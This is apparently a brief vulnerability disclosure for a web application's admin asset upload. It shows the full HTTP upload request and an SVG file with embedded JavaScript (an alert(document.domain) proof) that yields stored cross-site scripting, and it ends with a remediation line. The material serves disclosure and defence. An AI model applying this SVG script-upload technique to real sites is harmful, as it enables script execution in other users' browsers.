By uploading an SVG file containing JavaScript code in the file upload function on the administrator screen, it is possible to execute any script on the browser of the accessing user.
Log in to the administrator screen, access the Assets page, and upload the SVG file.
POST /admin/asset/add HTTP/1.1
...
-----------------------------32482956685473744651320483298
Content-Disposition: form-data; name="file"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
-----------------------------32482956685473744651320483298
...
http://localhost/files/asset/d6dbbeb510abf7a3498c0b8dbdbb61738a91ab06.svg
https://drive.google.com/file/d/1egSGIfDD9ZTitGCb9-bLVZmPdMqUPPyK/view?usp=sharing
Always filter files, limit the content type of uploaded files, and properly sanitize content.